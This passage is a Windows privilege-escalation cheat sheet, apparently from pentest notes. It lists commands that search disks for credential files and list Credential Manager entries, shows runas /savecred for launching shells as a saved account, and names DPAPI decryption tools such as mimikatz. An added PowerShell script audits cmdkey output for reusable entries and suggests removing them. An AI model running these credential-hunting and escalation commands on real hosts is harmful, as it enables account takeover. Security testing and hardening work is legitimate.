### Finding passwords

```cmd
rem cmd.exe syntax: recursive search for file names that suggest stored credentials
dir /s *pass* 2>nul
dir /s *cred* 2>nul
dir /s *secret* 2>nul
dir /s *.xml 2>nul
dir /s *.rdp 2>nul
dir /s *.ps1 2>nul
```

```powershell
cmdkey /list
# Or: Control Panel > User Accounts > Credential Manager

# Credential Manager stores account information, encrypted with the user's DPAPI key, under the path below.
# Decrypting it requires additional tools.
# C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials
```

### Privilege Escalation

There are two ways to escalate our privileges using credentials inside the Credential Manager:

```powershell
# 1. Create a session, run cmd.exe using the found credentials
runas /savecred /u:<USER> "cmd.exe"
runas /savecred /u:<USER> "powershell.exe"

# 2. Gain passwords in plaintext through decryption with DPAPI
# Tools: mimikatz, dploot, DonPAPI
```
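
To audit a host for the saved credentials described above, this added example (not part of the original page) parses `cmdkey /list` output and flags entries that `runas /savecred` can reuse, with a suggested cleanup command. The sample output is constructed; the English-locale labels and the `Domain:interactive=` target prefix for `runas /savecred` entries are assumptions, and the function names are hypothetical.

```powershell
# Constructed sample of `cmdkey /list` output (English locale assumed).
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=CORP\svc_admin
    Type: Domain Password
    User: CORP\svc_admin

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: dev1
'@

# Hypothetical helper: turn the Target/Type/User stanzas into objects.
function ConvertFrom-CmdKeyList {
    param([string[]]$Lines)
    $entry = $null
    foreach ($line in $Lines) {
        if ($line -match '^\s*Target:\s*(.+?)\s*$') {
            if ($null -ne $entry) { [pscustomobject]$entry }   # emit previous stanza
            $entry = [ordered]@{ Target = $Matches[1]; Type = ''; User = '' }
        } elseif ($null -ne $entry -and $line -match '^\s*(Type|User):\s*(.*?)\s*$') {
            $entry[$Matches[1]] = $Matches[2]
        }
    }
    if ($null -ne $entry) { [pscustomobject]$entry }           # emit last stanza
}

# Hypothetical helper: flag entries usable without a password prompt.
function Get-SavedCredentialFinding {
    param([string[]]$Lines)
    ConvertFrom-CmdKeyList -Lines $Lines | ForEach-Object {
        # Assumption: `runas /savecred` stores entries as Domain:interactive=<account>
        $reusable = $_.Target -like 'Domain:interactive=*'
        [pscustomobject]@{
            Target        = $_.Target
            Type          = $_.Type
            User          = $_.User
            RunasReusable = $reusable
            Remediation   = if ($reusable) { "cmdkey /delete:$($_.Target)" } else { 'review' }
        }
    }
}

# On a live host, pass (cmdkey /list) instead of the constructed sample.
Get-SavedCredentialFinding -Lines ($sample -split "`r?`n") | Format-Table -AutoSize
```

Entries flagged `RunasReusable` let any process in that user's session start programs as the saved account without a password prompt, so remove the ones that are not strictly needed.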